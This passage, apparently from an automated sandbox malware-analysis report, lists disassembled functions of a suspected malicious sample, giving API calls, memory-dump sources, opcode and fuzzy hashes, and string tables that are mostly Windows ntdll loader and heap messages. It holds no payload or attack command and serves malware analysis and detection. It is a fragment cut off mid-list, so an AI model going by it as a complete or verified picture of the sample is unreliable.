                                        • Instruction Fuzzy Hash: CC114871E4425876EB209BA19C42FDFBB7C8F81B54F15406AFA147B1C0D6BC570187E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004139E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 00413A60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 3b6ebb9f1b6ea7565838018a0607d0161814a42bac2fa2762e3bb03f812ea7a7
                                        • Instruction ID: b760794963ef5ed2611e46d7a32284747b51fd8dbc3ffaafd0458605ca096c21
                                        • Opcode Fuzzy Hash: 3b6ebb9f1b6ea7565838018a0607d0161814a42bac2fa2762e3bb03f812ea7a7
                                        • Instruction Fuzzy Hash: FC01C471E4021876EB20AAA19C42FDF7B7C9F41B54F114059BA147B2C1D6B8570687E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0042B253 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 60 42b253-42b297 call 404a83 call 42bf93 RtlFreeHeap
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B292
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: AaA
                                        • API String ID: 3298025750-4079228165
                                        • Opcode ID: 648b5efaa759b0e139c8e2afcc0a6dbea3d3e6302be444bec09973ef246f062a
                                        • Instruction ID: 38ce363a375eb3c3e0305712ccaf8f30e54eb23f1929fc120101e2b0e2da2384
                                        • Opcode Fuzzy Hash: 648b5efaa759b0e139c8e2afcc0a6dbea3d3e6302be444bec09973ef246f062a
                                        • Instruction Fuzzy Hash: A9E06DB12003047BD610EE59EC41FAB77ADEFC9714F004419FA08A7242C775B9118BF8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0042B203 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 96 42b203-42b244 call 404a83 call 42bf93 RtlAllocateHeap
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,0041DBAB,?,?,00000000,?,0041DBAB,?,?,?), ref: 0042B23F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 6c0510d663b59ed82a934a12d0b7eb398c059fd4ed6371b5ef1089e3b3d4c910
                                        • Instruction ID: c368d650f446e29dbfd2ccada13fb4838d56d10f46670bba35bada8a2e411119
                                        • Opcode Fuzzy Hash: 6c0510d663b59ed82a934a12d0b7eb398c059fd4ed6371b5ef1089e3b3d4c910
                                        • Instruction Fuzzy Hash: 2DE06DB12002047BDB14EE59EC41F9B77ADEFC8B14F004419FD08A7241C671BD108BB8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0042B2A3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 106 42b2a3-42b2db call 404a83 call 42bf93 ExitProcess
                                        APIs
                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,9E6EAF2B,?,?,9E6EAF2B), ref: 0042B2D6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: e282c69d2e7ba1ad4bc8d846b6f8512ecd456882b344e1e58ffd687dd5dd8bbc
                                        • Instruction ID: 14d288c5e34d674eaba974661daf32cb7f4ec39ca67e23df0f8a544d36696028
                                        • Opcode Fuzzy Hash: e282c69d2e7ba1ad4bc8d846b6f8512ecd456882b344e1e58ffd687dd5dd8bbc
                                        • Instruction Fuzzy Hash: 0CE08C322402147BC620EB5ADC01F9BB76CDFC5B24F10442AFE08AB241C671B9118BF8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 111 1762c0a-1762c0f 112 1762c11-1762c18 111->112 113 1762c1f-1762c26 LdrInitializeThunk 111->113
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                        • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                        • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                        • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-2160512332
                                        • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                        • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                        • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                        • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                        Download Yara Rule
                                        Strings
                                        • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                        • Thread identifier, xrefs: 0179553A
                                        • Invalid debug info address of this critical section, xrefs: 017954B6
                                        • 8, xrefs: 017952E3
                                        • corrupted critical section, xrefs: 017954C2
                                        • double initialized or corrupted critical section, xrefs: 01795508
                                        • Critical section address., xrefs: 01795502
                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                        • Critical section debug info address, xrefs: 0179541F, 0179552E
                                        • undeleted critical section in freed memory, xrefs: 0179542B
                                        • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                        • API String ID: 0-2368682639
                                        • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                        • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                        • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                        • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                        • @, xrefs: 0179259B
                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                        • API String ID: 0-4009184096
                                        • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                        • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                        • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                        • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                        • API String ID: 0-2515994595
                                        • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                        • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                        • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                        • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                        • API String ID: 0-1700792311
                                        • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                        • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                        • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                        • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                        Download Yara Rule
                                        Strings
                                        • HandleTraces, xrefs: 017A8C8F
                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                        • VerifierDlls, xrefs: 017A8CBD
                                        • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                        • VerifierFlags, xrefs: 017A8C50
                                        • VerifierDebug, xrefs: 017A8CA5
                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                        • API String ID: 0-3223716464
                                        • Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                        • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                        • Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                        • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                        • API String ID: 0-1109411897
                                        • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                        • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                        • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                        • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-792281065
                                        • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                        • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                        • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                        • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                        • apphelp.dll, xrefs: 01716496
                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                        • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-204845295
                                        • Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                        • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                        • Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                        • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                        • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                        • SXS: %s() passed the empty activation context, xrefs: 01792165
                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                        • API String ID: 0-861424205
                                        • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                        • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                        • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                        • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                        • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                        • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                        • LdrpInitializeProcess, xrefs: 0175C6C4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 0-475462383
                                        • Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                        • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                        • Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                        • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                        • String ID:
                                        • API String ID: 1404860816-0
                                        • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                        • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                        • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                        • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                        • API String ID: 0-379654539
                                        • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                        • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                        • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                        • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                        Download Yara Rule
                                        Strings
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                        • @, xrefs: 01758591
                                        • LdrpInitializeProcess, xrefs: 01758422
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-1918872054
                                        • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                        • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                        • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                        • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                        Download Yara Rule
                                        Strings
                                        • .Local, xrefs: 017528D8
                                        • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
